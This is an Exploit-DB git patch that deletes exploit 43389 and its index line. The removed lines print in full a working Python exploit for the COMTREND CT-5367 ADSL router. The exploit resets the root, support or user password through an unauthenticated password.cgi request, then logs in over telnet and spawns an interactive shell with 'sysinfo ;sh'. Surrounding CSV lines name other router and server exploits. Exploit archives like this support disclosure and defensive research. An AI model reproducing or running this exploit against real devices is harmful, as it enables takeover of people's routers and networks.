From 26a51e465709aa523123b948e0c82f9999cfcdb1 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sun, 31 Dec 2017 05:02:21 +0000
Subject: [PATCH] DB: 2017-12-31

2 changes to exploits/shellcodes

COMTREND ADSL Router CT-5367 - Remote Code Execution
---
 exploits/hardware/remote/43389.py | 124 ------------------------------
 files_exploits.csv                |   1 -
 2 files changed, 125 deletions(-)
 delete mode 100755 exploits/hardware/remote/43389.py
diff --git a/exploits/hardware/remote/43389.py b/exploits/hardware/remote/43389.py
deleted file mode 100755
index 90c491d6c..000000000
--- a/exploits/hardware/remote/43389.py
+++ /dev/null
@@ -1,124 +0,0 @@
-# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute
-# Date: 11-12-2017
-# Exploit Author: TnMch
-# Software Link : null
-# Type          : HardWare
-# Risk of use   : High
-# Type to use   : Remote
-
- 
-1. Description
-   
-Any user can edit all users password and execute remote code directly without have access 
-   
-2. Proof of Concept
- 
-request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi
- 
-<form>
-<table border="0" cellpadding="0" cellspacing="0">
-   <tr>
-      <td width="120">Username:</td>
-      <td><select name='userName' size="1">
-            <option value="0">
-            <option value="1">root <!-- admin -->
-            <option value="2">support <!-- support -->
-            <option value="3">user <!-- user -->
-         </select></td>
-   </tr>
-   <tr>
-      <td>Old Password:</td>
-      <td><input name='pwdOld' type="password" size="20" maxlength="16"></td>
-   </tr>
-   <tr>
-      <td>New Password:</td>
-      <td><input name='pwdNew' type="password" size="20" maxlength="16"></td>
-   </tr>
-   <tr>
-      <td>Confirm Password:</td>
-      <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td>
-   </tr>
-</table>
-<br>
-<center><input type='button' onClick='btnApply()' value='Save/Apply'></center>
-</form>
- 
-   
-3 .exploit 
-
-
-#!/usr/bin/env python
-import platform
-import requests
-import base64
-
-url = "http://192.168.1.1/"
-
-''' first check default gateway '''
-
-r = requests.get(url,allow_redirects=True)
-resp = r.content
-
-'''Check resp'''
-
-if 'Authorization' not in resp:
-    exit("[-]Invalid host !! ")
-
-''' Change password '''
-
-again = True
-
-while again:
-    print "Which User"
-    print "(root | support | user )"
-    user = raw_input('user : ').split()[0]
-
-    if user not in ("root","support","user"):
-        exit("[-] No user with this name !! ")
-
-    print "[+] Update password ",user
-    password = raw_input('new password : ').split()[0]
-    print "[+] Update new password ['",password,"']"
-
-    if user == "root":
-       url +="password.cgi?sysPassword="+password
-    if user == "support":
-       url +="password.cgi?sptPassword="+password
-    if user == "user":
-       url +="password.cgi?usrPassword="+password
-
-    pass_b64 = password.encode('base64').split()[0]
-
-    r2 = requests.get(url,allow_redirects=True)
-    resp2 = r2.content
-
-    ''' Check update '''
-
-    if pass_b64 in resp2:
-        print "[+] Password for user : ",user," updated!"
-        print "Happy hacking :D, enjoy"
-    else:
-        print "[-] Something Wrong , please check again! "
-    
-    y_n = raw_input('Do you want again? :D (y/n) : ').split()[0]
-    
-    if 'n'!= y_n and 'y' != y_n:
-        exit('bad input :(')
-    if y_n == 'n':
-        print "Go Go Go :D ,No Time for you Mr.Robot"
-        shell_yn=  raw_input("Do you want shell? (y/n) :D : ").split()[0]
-        if shell_yn !='n':
-            sys = platform.system()
-            if sys =="Windows":
-                exit("Sorry only on Linux or Mac Os")
-            from pwn import *
-            target = "192.168.1.1"
-            port = 23
-            p = remote(target,port)
-            p.recvuntil("Login:")
-            p.sendline(user)
-            p.recvuntil("Password:")
-            p.sendline(password)
-            p.sendline("sysinfo ;sh")
-            p.interactive()
-        again = False
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6c2172ab5..637bff09f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -15873,7 +15873,6 @@ id,file,description,date,author,type,platform,port
 43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux,
 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
-43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware,
 43407,exploits/windows/remote/43407.rb,"ALLMediaServer 0.95 - Buffer Overflow (Metasploit)",2017-12-28,"Anurag Srivastava",remote,windows,
 43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
